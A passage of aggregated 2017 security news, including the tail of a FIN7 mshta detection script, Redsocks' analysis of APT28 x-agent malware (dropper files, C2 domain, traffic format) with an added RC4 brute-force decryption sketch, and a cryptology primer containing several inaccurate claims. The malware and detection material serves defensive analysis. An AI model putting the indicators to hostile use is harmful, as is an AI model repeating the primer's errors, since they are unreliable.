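            alerts.append((e["pid"], "mshta_inline_script", severity))
        if image in CHILDREN_OF_INTEREST and "mshta.exe" in parents:
            alerts.append((e["pid"], f"{image[:-4]}_spawned_by_mshta", "high"))
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

The benign-looking event 600 (mshta opening an .hta file from explorer) is left alone on purpose; the rules key on the inline script argument and on what mshta goes on to spawn, which is what separates this lure from legitimate HTA use.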
The campaign was also observed using a HALFBAKED backdoor variant, capable of performing various operations based on commands received from the server: send victim machine information (OS, Processor, BIOS and running processes) using WMI queries; take screenshots of victim machine; execute a VB script, EXE file, or PowerShell script; and delete or update a specified file.
One of the LNK files used by FIN7 in this campaign revealed some specific information about the attackers, namely that the shortcut launched within the string data, and that the actor likely generated this file on a VirtualBox system with hostname “andy-pc” on March 21, 2017, the researchers note.
State-Affiliated Hackers Responsible for Nearly 1 in 5 External Data Breaches: Verizon DBIR
27.4.2017 securityweek Incident
The Verizon Data Breach Investigations Report (DBIR) is industry's go-to analysis of security incidents and successful breaches over the previous year. The latest report was published Thursday.
The 2017 DBIR (PDF) marks the report's 10-year anniversary. Over the last decade, it has grown from an analysis of Verizon's own breach data knowledgebase to now include breach data from 65 different organizations. The latest report includes analyses of 42,068 incidents and 1,935 breaches from 84 countries.
Highlights show that the insider threat remains fairly constant as the cause of 25% of breaches, but with 75% being perpetrated by outsiders. The externally-caused breaches, according to Verizon, comprise 51% involving organized crime groups, 18% from state-affiliated actors, 3% comprising multiple parties, and 2% involving partners.
Sixty-two percent of all breaches involved hacking, and 81% of those leveraged either stolen and/or weak passwords. The clear implication is that both organizations and individuals were still, at least in 2016, not exercising adequate password hygiene; that is, strong and regularly changed passwords.
Verizon's figures show that the finance sector is the most frequently breached vertical. Twenty-four percent of breaches affected financial organizations. This was followed by healthcare at 15%; retail and accommodation combined at 15%; and public entities at 12%.
Other key statistics highlighted by Verizon include: most malware is installed via malicious email (66%); an even higher percentage (73%) of breaches are financially motivated; and 21% were related to cyberespionage.
Verizon hopes that these statistics on recent breaches can help practitioners better protect their organizations today.
"Insights provided in the DBIR are leveling the cybersecurity playing field," said George Fischer, president of Verizon Enterprise Solutions. "Our data is giving governments and organizations the information they need to anticipate cyberattacks and more effectively mitigate cyber-risk. By analyzing data from our own security team and that of other leading security practitioners from around the world, we're able to offer valuable intelligence that can be used to transform an organization's risk profile."
This intent is further aided by a breakdown of methods used to attack the different vertical sectors. For example, the report notes that the accommodation and food services sector "was dominated by POS breaches. Most of them are opportunistic and financially motivated and involve primarily malware and hacking threat actions. Time-to-compromise is quick but time-to-discovery and containment remains in the months category."
One frequently highlighted attack vector is the web application attack, noted particularly in the financial and insurance; information; and retail sectors. "Attackers are always looking for the weakest link in your IT infrastructure, before leveraging expensive 0-days and complicated APT attacks," explains Ilia Kolochenko, CEO of High-Tech Bridge. "Today, the majority of large organizations and governments can be easily breached via their web and mobile (backend) applications."
He adds that this attack vector is still growing with the increasing use of third-party cloud services and applications, "which are exploited by hackers to compromise your trusted third-party and get access to your data afterwards... The report confirms Google's research, which found a 32% increase in website hacking in 2016. Application security becomes a major problem for organizations and should be addressed as a high priority," he suggests.
If there is any weakness in the DBIR as a guide for what to do today, it is that DBIR is an historical analysis of what has already happened in the recent past. For example, the report states that 51% of breaches included malware. On its own, this could persuade organizations to beef up their anti-malware defenses. However, because the analysis looks at past breaches rather than current threats, there is no clear indication of the current growth in non-malware attacks. Anti-malware defenses will not detect such attacks (which typically might use OS apps such as PowerShell) because there is no malware to detect.
Another example could be ransomware. Ransomware is difficult to place in the analysis because it is not a breach within Verizon's definition of breach (actual exfiltration of data), but clearly more than an incident. Furthermore, it is not unusual for infected organizations to decline to disclose the incident -- both of which factors could affect Verizon's statistics. To solve this issue, Verizon used telemetry data from McAfee as its information source.
McAfee's figures confirmed Verizon's own statistics -- that is, that the incidence of ransomware continues to rise -- but McAfee can provide greater detail. The difference is that McAfee's telemetry provides threat statistics, while the DBIR provides breach statistics. To get a complete view of the current situation, organizations need to consider both recent breaches and currently evolving threats.
Nevertheless, DBIR remains an invaluable resource for security practitioners. "From the beginning," it concludes, "our primary goal was, and still remains, to help organizations understand the threats they are facing, and enable them to make sound evidence-based risk management decisions."
Cryptology for Business and Organizations in the 21st Century
27.4.2017 securityaffairs Safety
Cryptology is the mathematical foundation of penetration testing and can be adopted as a resource for securing assets and communications.
An overview of the science of the occult, which brings forth a new level of security in the age of digital privacy. Cryptology is the mathematical foundation of penetration testing and can be adopted as a resource for securing assets and communications. Join us in this quest into the science of the occult.
Cryptology is the branch of mathematics that encompasses cryptography, cryptanalysis, steganography and lock picking. The etymology of the word is “kryptós + logos”, which means the study of the occult. Cryptography is a process in which an insecure message undergoes a mathematical transformation that generates a secure message. The insecure message is called plaintext, and the encoded message is called ciphertext.
The reverse process, obtaining the plaintext from the ciphertext, is called cryptanalysis. Steganography is a mathematical function by which a secret message is hidden in other secret messages. Lock picking is an attack on a physical encoding device, where a key opens a lock.
Cryptology can give businesses and organizations a new degree of security when implemented as part of an in-depth defense of data. A cryptographic algorithm, also called a cipher, is a mathematical function used for the encryption and decryption of a message. Restricted algorithms keep secret how the algorithm itself works and can be compromised if the key is revealed to anyone. The range of all possible values of the key is called the keyspace.
There are two types of cryptographic algorithms: symmetric and public key. Symmetric algorithms have the property that the encryption key can be calculated from the decryption key and vice versa. Symmetric algorithms can be divided into block ciphers and stream ciphers.
Public key algorithms, also called asymmetric algorithms, use different keys for encryption and decryption. The decryption key cannot be calculated from the encryption key, so the encryption key can be made public. The encryption key is called the public key and the decryption key the private key.
The main goal of cryptography is to provide confidentiality, authentication, integrity and nonrepudiation to the sender and the receiver of a communication. Cryptology is the mathematical foundation of modern day penetration testing. Penetration Testing uses some tools of cryptanalysis like THC Hydra in an attack, which is defined as a cryptanalysis attempt. The loss of a key through other means is called a compromise. Brute force, also called dictionary attack, is one case of cryptanalysis.
Cryptology is also related to penetration testing through the security of the algorithm itself. Lars Knudsen classifies four ways of breaking an algorithm: total break, global deduction, instance deduction and information deduction.
Cryptanalysis is used in side channel attacks, where physical emanations are analyzed; such techniques can give authorities and law enforcement agencies a means of monitoring a suspect, for example by generating a thermal image through walls.
The development of cryptology and side channel attacks can give law enforcement agencies a new degree of chain of custody without risking the lives of personnel while investigating suspects.
In a global deduction attack, cryptanalysis can proceed without knowing the key by instead finding an equivalent function that is accepted in place of the key. The study of discrete logarithms applies to elliptic curve cryptanalysis, in which the Pollard rho attack is used to break public key algorithms.
It is important for organizations and governments to develop and use cryptology as a protective resource aligned with the other good practices adopted in their information security strategy. As of today, cryptology can be adapted to every business and incorporated into its security best practices at very low cost, using open-source models like PGP.
Developing information security and cryptology together can help fill the gap in new talent sourcing and the development of a national labor force, and make it harder for attackers to gain access to sensitive data.
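The Pollard rho attack named above is short enough to show in full on a toy group, which also makes the point about key sizes concrete. What follows is an added example, not part of the article: it solves g^x = h in the multiplicative group modulo a small prime using the standard three-way partition walk and Floyd cycle detection, then extracts x from the resulting linear relation (handling the case where the relation only determines x modulo a divisor of the group order). The parameters are constructed: p = 1019 is prime with p - 1 = 2 * 509, and g = 2 generates the whole group, so the order is n = 1018. The algorithm's cost grows with the square root of n, which is why groups of order around 2^256 are used in practice.

```python
"""Pollard's rho for discrete logarithms on a toy group.

Added example, not from the article. Constructed parameters: p = 1019 is
prime, p - 1 = 2 * 509, and g = 2 is a generator of Z_p^*, so the group
order is n = 1018. The running time is about sqrt(n) group operations.
"""
import random
from math import gcd
from typing import Optional, Tuple

P, G = 1019, 2
N = P - 1                        # order of G in Z_p^* (G is a generator)

Walk = Tuple[int, int, int]      # (x, a, b) with x = g^a * h^b mod p


def _step(x: int, a: int, b: int, g: int, h: int, p: int, n: int) -> Walk:
    """Pseudo-random walk; the group is split into three classes by x mod 3,
    and the exponents (a, b) are updated so x = g^a h^b stays true."""
    r = x % 3
    if r == 0:
        return (x * x) % p, (2 * a) % n, (2 * b) % n
    if r == 1:
        return (x * g) % p, (a + 1) % n, b
    return (x * h) % p, a, (b + 1) % n


def pollard_rho_dlog(g: int, h: int, p: int, n: int, rng: random.Random) -> Optional[int]:
    """One attempt: Floyd cycle detection finds a collision
    g^a1 h^b1 = g^a2 h^b2, i.e. (a1 - a2) = x (b2 - b1) mod n."""
    a0, b0 = rng.randrange(n), rng.randrange(n)
    tort: Walk = ((pow(g, a0, p) * pow(h, b0, p)) % p, a0, b0)
    hare = _step(*tort, g, h, p, n)
    while tort[0] != hare[0]:
        tort = _step(*tort, g, h, p, n)
        hare = _step(*_step(*hare, g, h, p, n), g, h, p, n)
    _, a1, b1 = tort
    _, a2, b2 = hare
    lhs, rhs = (b2 - b1) % n, (a1 - a2) % n
    d = gcd(lhs, n)
    if lhs == 0 or rhs % d:
        return None                       # degenerate collision; caller retries
    m = n // d
    base = (rhs // d) * pow(lhs // d, -1, m) % m
    for k in range(d):                    # d candidates when gcd(lhs, n) > 1
        cand = (base + k * m) % n
        if pow(g, cand, p) == h:
            return cand
    return None


def solve(h: int, seed: int = 1) -> int:
    """Discrete log of h to base G modulo P, retrying degenerate walks."""
    rng = random.Random(seed)
    for _ in range(200):
        x = pollard_rho_dlog(G, h, P, N, rng)
        if x is not None:
            return x
    raise RuntimeError("no solution found")


if __name__ == "__main__":
    secret = 777
    print(solve(pow(G, secret, P)))       # recovers 777
```

Every candidate is verified with `pow(g, cand, p) == h` before it is returned, so a wrong branch of the congruence can never be reported as the answer; the retry loop in `solve` covers the rare walks whose collision gives no information about x.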
The Israeli Government announces it thwarted a major cyberattack
27.4.2017 securityaffairs CyberWar
The Israeli Government announces it thwarted a major cyberattack against 120 targets just days after harsh criticism of new cyber defense bill.
According to haaretz.com, the Israeli Government revealed it repelled a major cyberattack aimed at 120 targets.
The unusual announcement was made by the Prime Minister’s Office (PMO) on Wednesday. Israel suspects a foreign state was behind the major cyberattack that hit the country in recent days.
“The notice from the PMO comes only two days after the heads of the Shin Bet security service, the Mossad and the IDF’s deputy chief of staff, along with other senior defense officials, wrote a letter to Prime Minister Benjamin Netanyahu, warning that the numerous powers given to the Cyber Defense Authority could hamper the ability to thwart cyber attacks on Israel.” states Haaretz.
The defense officials asked the Prime Minister to halt the bill’s legislation and review it in order to propose a new version.
“The draft bill seeks to grant extensive powers to the Cyber Authority, whose purpose has not been clearly defined, and it could seriously harm the core security activity of the security community in the cyber field,” said the letter signed by Shin Bet security service head Nadav Argaman, Mossad chief Yossi Cohen, Deputy Chief of General Staff Maj. Gen. Yair Golan (who is responsible for cyber defense issues in the army) and Defense Ministry Director General Udi Adam.
The Israeli Cyber Defense Authority was responsible for defending the country’s networks against the attacks; it had recently warned the Government of a massive planned cyber attack on Israel.
According to the Cyber Defense Authority, the hackers impersonated a legitimate, unnamed organization in a spear phishing campaign.
The phishing messages were crafted to appear to have been sent from the servers of an academic institution and a private company. The phishing emails reached 120 Israeli institutions, government offices, and individuals; the attackers used weaponized documents that attempted to exploit a vulnerability in Microsoft Word.
In response to the cyber attack, the Cyber Defense Authority issued directives for all Israeli citizens, businesses, and institutions, to instruct them on how to neutralize the attack and reduce the exposure to the cyber threats.
The criticized bill aims to regulate the activity of the Cyber Defense Authority. According to Buky Carmeli, the head of the Authority, the law focuses on issuing protection guidelines to thousands of companies, organizations, and public agencies.
Carmeli says the distribution of guidelines is crucial to protect the country from cyber attacks, as well as to establish regulations for cybersecurity and emergency management.
Hack'em If You Can — U.S. Air Force launches Bug Bounty Program
27.4.2017 thehackernews BigBrothers
With the growing number of data breaches and cyber attacks, a significant number of companies and organizations have started Bug Bounty programs for encouraging hackers and bug hunters to find and responsibly report vulnerabilities in their services and get rewarded.
Now, following the success of the "Hack the Pentagon" and "Hack the Army" initiatives, the United States Department of Defense (DoD) has announced the launch of the "Hack the Air Force" bug bounty program.
Hacking or breaking into Defense Department networks was once illegal, but after the "Hack the Pentagon" initiative, the DoD started rewarding outsiders for finding and reporting weaknesses in its private networks.
"This is the first time the AF [Air Force] has opened up...networks to such a broad scrutiny," Peter Kim, the Air Force Chief Information Security Officer said in a statement. "We have malicious hackers trying to get into our systems every day."
"It'll be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cyber security and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities."
The "Hack the Air Force" program is directed by HackerOne, the bug bounty startup that was behind Hack the Pentagon, and Luta Security, the security consulting company driving the U.K. program.
Hackers From The Five Eyes Nations Are Invited
This program will be the DoD's largest bug bounty project as it invites experts and white hat hackers not only from the United States, but also from remaining Five Eyes countries: the United Kingdom, Canada, Australia and New Zealand.
So, only hackers and bug hunters from the Five Eyes intelligence alliance are eligible to participate in Hack the Air Force.
"This outside approach – drawing on the talent and expertise of our citizens and partner nation citizens – in identifying our security vulnerabilities will help bolster our cyber security," said Air Force Chief of Staff Gen. David L. Goldfein.
"We already aggressively conduct exercises and 'red team' our public facing and critical websites. But this next step throws open the doors and brings additional talent onto our cyber team."
Only Vetted Hackers Can Participate
Only "vetted hackers" can participate in the Hack the Air Force program, which means candidates must pass a rigorous background check after registration and have a clean criminal record in order to take part.
According to some critics, this process excludes many talented hackers and bug hunters; still, it is one of the common conditions across all of the Pentagon's bug bounty programs.
Registration for "Hack the Air Force" will start on May 15 and interested participants should register through HackerOne. The contest will launch on May 30 and last until June 23.
The first DoD bug bounty program, "Hack the Pentagon," came in April 2016, in which over 14,000 participating hackers found 138 vulnerabilities in DoD systems and were awarded over $75,000 in bounties.
Just like the bug bounty programs offered by several leading companies in the technology industry, Hack the Air Force is also an exercise for the federal authorities to strengthen their security measures and counter cyber attacks.
Save the Internet: FCC Unveils Plan to Rollback Net-Neutrality Rules
27.4.2017 thehackernews IT
After crushing a set of privacy rules on ISPs that restricted them from sharing your online data with third parties without your consent, President Donald Trump's newly appointed FCC chairman Ajit Pai has announced the first move in his effort to kill off Net Neutrality.
The US Federal Communications Commission (FCC) has announced that it will roll back net neutrality rules that require Internet service providers (ISPs) to treat all services and websites on the Internet equally.
Before moving forward, let’s first understand what Net Neutrality means.
What is Net Neutrality And Why It's Important?
Net Neutrality is simply the Internet Freedom — Free, Fast and Open Internet for all.
Net Neutrality is the principle that ISPs should give consumers access to all content and applications on an equal basis, treating all Internet traffic equally.
Today, if there is something that makes everyone across the world ‘Equal,’ it’s the Internet.
Equality over the Internet means all ISPs have to treat Facebook or Google the same way as your local shop’s website, and the richest man in the world has the same right to access the Internet as the poorest.
And this is what "Net Neutrality" aims at.
FCC Unveils Plans to Kill Net Neutrality
But, What if someone snatches this Internet Freedom from you all? What if you have to pay ISPs extra for loading your website faster? What if you can't access your favorite website, which has been blocked by your ISP?
The FCC's new Chairman Pai is planning to do exactly that in the United States.
In a 400-page document released Wednesday, the FCC detailed its new plan which, if passed, would allow ISPs to give or sell access to "fast lanes" and block web traffic to others.
In other words, the new plan will allow ISPs to block access to legal content, restrain connections for users attempting to access certain sites or services and to be paid for prioritizing some lawful web traffic over other lawful web traffic.
This simply means that if, for example, you love watching movies and TV series on Netflix, then Comcast and Verizon, which have their own video services, will slow down the connection to the competing service when you try to access it, and you would eventually end up watching videos on the services they want you to use.
Here’s how FCC Chairman Pai justified reversing the Net Neutrality rules:
"We need rules that focus on growth and infrastructure investment, rules that expand high-speed Internet access everywhere. Rules that give Americans a more online choice, faster speeds, and more innovation," Pai said.
Pai argued that the 2015 regulations under the Obama administration had discouraged ISPs from investing in their networks and had slowed the expansion of internet access.
Also, ISPs are much more likely to strike valuable deals with large, established websites and services than relatively unknown companies or startups, which will be hit hardest by this new move.
"Without net neutrality, the incumbents who provide access to the Internet would be able to pick winners or losers in the market," reads a letter sent to Pai by a group of 800 startups.
"They could impede traffic from our services in order to favor their own services or established competitors. Or they could impose new tolls on us, inhibiting consumer choice. Those actions directly impede an entrepreneur’s ability to ‘start a business, immediately reach a worldwide customer base, and disrupt an entire industry."
Meanwhile, with no surprise, ISPs including Comcast, Verizon, and AT&T have welcomed the new plans.
The FCC will vote on May 18 on the proposed rule change rolling back its 2015 regulations, but Mr. Pai has not revealed what he wants to replace the net neutrality rules with.
Once approved, the proposal will remove any legal power the FCC currently has to regulate ISPs, returning everything to the state it was before 2015.
Pai, who has openly expressed his views against net neutrality in the past, was previously quoted as saying that Net Neutrality was "a mistake" during a speech at Mobile World Congress.
The non-profit foundation Electronic Frontier Foundation (EFF) is encouraging people to take action before it gets too late and "tell Congress to stop the FCC from throwing Internet users and innovators to the wolves."
Hackers can get into PCs because of a monitor flaw. Millions of devices are at risk
27.4.2017 Novinky/Bezpečnost Vulnerabilities
Computer pirates usually look for security holes in the operating system or in individual installed applications in order to open a back door into other people's PCs. Although it may sound unbelievable at first glance, they can just as well abuse monitors, or rather their control software, for an attack.
The flaw concerns monitor control software from Portrait Displays, which is used by the vast majority of manufacturers.
The serious vulnerability affecting monitors, which puts millions of computers at risk, was flagged by the Czech national security team CSIRT.CZ, operated by the CZ.NIC association.
"A security flaw has been identified in software developed by Portrait Displays, whose products are used by a number of large manufacturers such as Sony, HP, Acer, Fujitsu, Philips, Dell, Benq, Lenovo, Sharp and Toshiba," said Pavel Bašta, security analyst at CSIRT.CZ.
The main problem is that so many manufacturers rely on Portrait Displays' control software, which is why so many users are theoretically at risk. However, security experts have not yet observed any exploitation of the flaw.
They can take control of the attacked machine
"Portrait Displays has rated the flaw, which allows a logged-in attacker to execute arbitrary code and escalate system privileges, as critical," Bašta stated.
According to him, computer pirates could abuse the vulnerable software, for example, to rotate the image on the attacked machine or change the colour settings. Beyond these seemingly harmless pranks, however, in the extreme case the security hole could also be abused to take control of the attacked computer.
Given the possible risks, users should download the latest control-software updates from the individual manufacturers' sites, where they are available. Portrait Displays has already released a patch for the discovered flaw to monitor manufacturers.
Don't install the big Windows update yourself, Microsoft advises. It contains bugs
27.4.2017 Novinky/Bezpečnost Security
This month Microsoft tried to improve the Windows 10 operating system through another big update. As it turned out, however, this long-awaited update contains a whole range of bugs. Representatives of the American software giant therefore urged users not to install the so-called Creators Update themselves.
The Creators Update package was officially released two weeks ago. It must be stressed, however, that Microsoft has not been offering it automatically to all users since then. It releases the package of improvements to individual users gradually through the Windows Update service, which is used to install all updates from the American software giant.
At the same time, however, Microsoft offered a downloadable tool directly on its site through which the installation of the new features could be sped up. That turned out to be the biggest problem.
Problems with specific hardware configurations
Although the American software giant's staff tested the update over the last several months, they evidently did not entirely manage to try out all the various hardware combinations, that is, to optimise the update for millions of different computers.
After installation, some users began complaining about various problems. For example, brightness could be set to the minimum level after every restart; when playing some titles in full screen it happened that one could not return to the system itself without a restart; or, because of an error in the configuration of the Windows Forms libraries, antivirus programs did not start correctly and were thus non-functional for the whole time the PC was in use.
Representatives of the American software giant have therefore now urged users, in their own interest, not to install the Creators Update themselves but to wait until it appears in Windows Update on their computer. That will mean it has been tested for their hardware configuration.
That, of course, will probably take several weeks, in the extreme case even several months.
What the Creators Update brings
Creators Update can be translated as an update for creative people, and it is probably the most apt name the American software giant could have used, because the new features target precisely creative users.
With the new update the American software giant also focused on Windows 10's 3D capabilities. In the new Paint 3D you can create three-dimensional objects, easily change colours, add stickers or turn 2D objects into three-dimensional works of art. Creations can also be easily shared with others, and you can use other people's 3D drawings in your own work if their authors allow it.
Gamers also received attention in the update. Users will be able to easily stream their matches against opponents to the internet, directly from Windows 10, without having to log in anywhere or install additional software.
Tournaments can also be created easily, with just a few clicks, through the Arena feature, in which users set their own rules and determine exactly who can play.
Further improvements concern the Microsoft Edge browser, above all ease of use but also security. Security and privacy protection has been improved across the whole of Windows 10.
GrSecurity security patches will no longer be available for free
27.4.2017 Root.cz Vulnerabilities
Brad Spengler has announced that the GrSecurity and PaX kernel security patches will no longer be available for free. Only paying customers will get them. It is now up to the community to maintain the old versions or develop them further.
The GrSecurity project announced that it is ceasing to publish public test patches for the Linux kernel and will henceforth concentrate only on paying customers. With immediate effect all code was removed from the public repository, and kernel 4.9 was deliberately chosen as the last one supported by publicly available code. It is an LTS kernel version with extended support, so users should have enough time to adapt to the change. No public versions of the PaX security extension will be available any more either.
Developer Brad Spengler reportedly wants to focus on a new generation of security mechanisms that will protect users against modern threats. In the announcement of the change (+ FAQ) he specifically mentions a focus on ARM64, Android, RAP support for stable kernels, KERNSEAL, STRUCTGUARD and other modern defence mechanisms against data-only attacks.
Existing paying customers are reportedly unaffected by the change; if a company depends on the now non-existent public -test repositories, it should become a paying customer. Those customers will then have access to the -beta repositories with code for the latest kernels.
For everyone else there is bad news: according to Spengler, no alternative solution exists. The Linux community has failed to invest in security over the last twenty years. That is also why there is no direct alternative, or even a way to obtain at least some of GrSecurity's features by other means, says the announcement, which also links to a comparison of the features of existing Linux security projects.
Thanks to the GNU GPL 2 licence there is of course a chance that the Linux community will take over the patches published so far and someone will maintain them and support newer kernels. The author himself does not want to do that, however, and refuses to publish the old versions, reportedly so as not to encourage users to run old, insecure kernels. He also points out that the name GrSecurity is protected by a registered trademark, so anyone who continues to work with the code must do so under a different name.
GrSecurity is a set of patches for the Linux kernel that significantly increase system security and resistance to attacks. It has existed since 2001, and for almost ten years Brad Spengler has developed it under the banner of his company Open Source Security, Inc. GrSecurity and PaX have always been very pioneering projects; they were, for example, the first to bring ASLR support to the Linux kernel.
Brad Spengler has long been dissatisfied that his modifications were not well received by the Linux community and only a small part made it into the kernel. The main problem was always that it is one huge, unstructured patch whose quality, moreover, Linus did not like. He did not hesitate to call some of the changes "insane".
The developers therefore decided to create their code separately from the kernel and give away development versions for free. According to them, many companies started using the patches, but only a small fraction were willing to pay. Two years ago the author therefore decided to supply stable patches only to paying customers. Now this restriction has been extended to all code, including the test code.
The question remains whether such a procedure complies with the wording of the GNU GPL v2 licence under which the Linux kernel is released. Richard Stallman stated some time ago that such conduct violates the licence. GrSecurity is a modification of code distributed under the GNU GPL, but the author is trying to prevent users from sharing the result, which must also be made available under the same licence.
Cracking APT28 traffic in a few seconds
27.4.2017 securityaffairs APT
Security experts from security firm Redsocks published an interesting report on how to crack APT28 traffic in a few seconds.
Introduction
APT28 is a hacking group involved in many recent cyber incidents. The most recent attack allegedly attributed to this group is the one on French presidential candidate Emmanuel Macron’s campaign. Incident response to this Advanced Persistent Threat (APT) and damage limitation rely heavily on network traffic investigation.
In late 2016, Redsocks Security identified one expired domain attributed to APT28. Our effort to sinkhole APT28 using this domain was impeded by the encrypted communication channel. Although many published white papers on APT28, such as ESET’s, mention the RC4 encryption algorithm, they do not dig into the details of the key used or of APT28’s implementation of RC4, i.e. whether the key is static and breakable. In this report, we aim to reveal the results of our comprehensive dynamic analysis of the x-agent malware towards decrypting its traffic. We started our investigation by using one of the APT28 droppers (see Table 1).
The focus of our investigation has been decrypting APT28 communicated traffic. Thus, this report elaborates more on the encryption functionality of x-agent and reports our findings on cracking x-agent communicated traffic. That said, our report is not limited to encryption cracking and sheds light on the following:
Execution behavior of the dropper and x-agent
Network behavior of x-agent
Encryption of APT28 and an algorithm to crack it in few seconds
Following the encryption-decryption scheme we present, and by large-scale internet scanning and searching for the URL pattern we introduce in this white paper, currently active APT28 servers and victims can be found, and communication with these servers can be established for further investigation.
X-agent dropper
The dropper functions in two steps. In the first step, it only unpacks a dll to the Windows folder. The name of the file is fixed (static) and does not change across multiple executions or on different workstations. In the second step, the dropper loads the dll by calling the ShellExecuteW function of the shell32 library. This function runs rundll32.exe with "C:\Windows\83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll",init as arguments. This means that the trace of the malware should later be looked for in the rundll32 execution. The dropper also creates an “ose00000.exe” file in the Windows folder and calls it with the dll and the dropper path as arguments. In summary, the dropper creates two files, “83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll” and “ose00000.exe”, in the Windows directory with the hidden attribute set (see Table 1 for the corresponding hashes) and loads one of them with rundll32.exe. The result of the dropper execution is rundll32.exe and ose00000.exe running as two separate processes. No network activity was observed during dropper execution.
X-agent dropped rootkit
The dropper goal was to transfer control to 83D2CDE2-8311-40CB-B51D-EBE20FA803D1.dll (see Table 1 for SHA256 hash) which is a rootkit with keylogging and remote code execution capabilities.
X-agent architecture
x-agent has a sophisticated architecture; it has a modular structure in both functionalities and the communication channel implementation. Figure 1 presents the x-agent architecture of the sample we analyzed.
X-agent execution
Execution starts from the init function of the dll loaded by rundll32. The first interesting event after control is transferred to Init is a call to KERNEL32.GetVolumeInformationW. After this call, the Init function initializes the global variables:
Next, the init function initializes the modules available for execution (see the ESET report for an explanation of the modules). Our malware sample had 3 modules:
Keylogging module, dubbed modKey in the code
File system module, dubbed modFS in the code
Remote shell module, dubbed modProcRet in the code
After initializing the data structure of these modules, CHOPSTICK creates different threads for different tasks. Modules are created in a loop based on their configuration and AgentKernel is created differently:
After the threads are created, execution is transferred to the AgentKernel and module threads. The AgentKernel module initially prepares a message for the server and then waits for the server to respond with a command. The message is intended to introduce the victim to the server by an agent ID and to report the modules supported for execution. This message is written to the edg6EF885E2.tmp file in the temp folder. The sample we analyzed communicates over an HTTP channel; the implementation uses the WININET APIs.
Before sending data, the channel thread checks connectivity to the server. It first tries to resolve the “adobeincorp.com” domain name. If that fails, it tries connecting to two hardcoded IP addresses. After a successful connection to the server, it creates the URL request and POST data from the data prepared by the other modules. X-agent first sends a GET request and then a POST request. The communication is always encrypted. We explain the nature of the communicated data and the encryption method in the next section.
In summary, this sequence of actions happens in every execution of x-agent:
Call to KERNEL32.GetVolumeInformationW
Creation of at least 5 different threads
Read from and write to edg6EF885E2.tmp in the temp directory
Check connectivity by a call to socket.connect
Encrypt the URL query string and POST data
Send a GET request
Send a POST request
Send the supported commands and the agent number to the server using the WININET HTTP APIs
X-agent traffic communication
In order to explain how to decrypt APT28 traffic, we first need to understand the traffic pattern of the malware. The x-agent version 1 we analyzed communicates by sending an initial GET request followed by HTTP POST requests. The HTTP header values of the requests are hardcoded except for one query string of the request. The URL of an x-agent request looks like:
/webhp?rel=psy&hl=7&ai=L2Bd93t_o-jl022K1Og4Bm9mSk8QO88K_3ZQZuKcoPwur-5Q7Y=
The “/webhp?rel=psy&hl=7&ai=” part of the URL and the final “=” sign are the same across different executions. As a matter of fact, “/webhp?rel=psy&hl=7&ai=” is hardcoded in the code. The next 51 bytes are not plaintext; briefly, they contain the timestamp of the request and the ID of the agent. The initial POST data of x-agent is 71 bytes and ends with a “=” as well. The data is encrypted and, when decrypted, is equal to:
56 34 4D 47|4E 78 5A 57|6C 76 63 6D|68 6A 4F 47|39 79 5A 51|6B 30 84 F2|01 00 00 01|00 23 01 10|23 01 11 23|01 13 23
(In the original report the three fields are colour-coded; that highlighting is not preserved here. The first 20 bytes of the dump are the ASCII string “V4MGNxZWlvcmhjOG9yZQ”, the data token used as known plaintext later in this report.) The blue part is the ID of the agent (the victim). The yellow part is the ID of the module that sent the data. And finally, the green part is the list of modules, separated by the # character (0x23), that are installed and ready to be used by the server (see Figure 4 for more explanation).
Below is the HTTP implementation of the channel by x-agent:
X-agent traffic encryption
Encryption module
The encryption procedure is called with two arguments, which are pointers to two data structures. These data structures give the encryption class references to the following two items:
The seed for encryption
The data to be encrypted
The seed is hardcoded and, among other things, the init function copies it to the data segment using immediate constants:
Later in the code, 4 random bytes are appended to the seed, and together these form the encryption key. The seed is 50 bytes, so the key length in total is 54 bytes. The data can be of variable size. For instance, the default initial request from AgentKernel is 39 bytes in total (see Figure 4) and includes: the agent ID, the module ID (the sender of the message) and the supported modules. The data is always appended to a 20-byte data token, the agent ID and the sender module ID. This data token is used by the server to verify the result of decryption. After creating the ciphertext using RC4 (see the next section), the encryption procedure adds 8 random bytes to the message and then converts the whole binary string to URL-compatible BASE64. Next, the encryption procedure adds a 7-byte timestamp to the message. In summary, the encryption class does the following:
Generate 4 random bytes
Encrypt the message using RC4
Add 8 random bytes to the message
Convert the binary string to BASE64
Add a timestamp to the message (7 bytes in BASE64)
RC4 function
RC4 is a stream cipher algorithm based on byte permutation. An elaborate explanation of RC4 is out of the scope of this paper. The code below is the implementation of the RC4 algorithm by x-agent. The arguments to the function are the 4-byte random value, the seed and the plaintext data:
(CPU Disasm listing of the x-agent RC4 function; not reproduced here.)
How to decrypt x-agent data
As mentioned briefly, the only randomness in the x-agent encryption is the 4 random bytes appended to the 50-byte seed given in the previous section. Since RC4 is a synchronous stream cipher, the traffic can only be decrypted with the same key that was used for encryption. A decryption algorithm for x-agent must therefore use the same RC4 function with the same arguments. The cipher input must be the same byte stream as in the HTTP request, i.e. the timestamp and the random bytes must be stripped. The RC4 function must then be called in a brute-force loop over all 2^32 possible values of the 4 random bytes (0 to 2^32 − 1). This is a known-plaintext attack, since the result must contain “V4MGNxZWlvcmhjOG9yZQ”. The encryption can be broken in a matter of seconds on a normal personal computer.
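To make the encryption and decryption scheme above concrete, here is an added Python re-creation of it, written for this page and not taken from the Redsocks report or the malware: it rebuilds the message format (RC4 with seed plus 4 random bytes, 8 trailing random bytes, URL-safe BASE64, 7-character timestamp) and then recovers the plaintext of a captured string with the known-plaintext search over the 4-byte key suffix. The 50-byte SEED is a constructed placeholder (the real seed is only in the report's disassembly), the timestamp is assumed to be prepended because the encoded part keeps its trailing "=", and the search loop takes a cap so the demo stays small.

```python
import base64
import struct

# Constructed placeholder seed: the real 50-byte hardcoded seed appears only in
# the report's disassembly screenshot, so this value is NOT the real one.
SEED = bytes(range(0x41, 0x41 + 50))

# Known plaintext from the report: every decrypted message starts with this
# 20-byte data token, which the server uses to verify decryption.
DATA_TOKEN = b"V4MGNxZWlvcmhjOG9yZQ"


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA). Encryption and decryption are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
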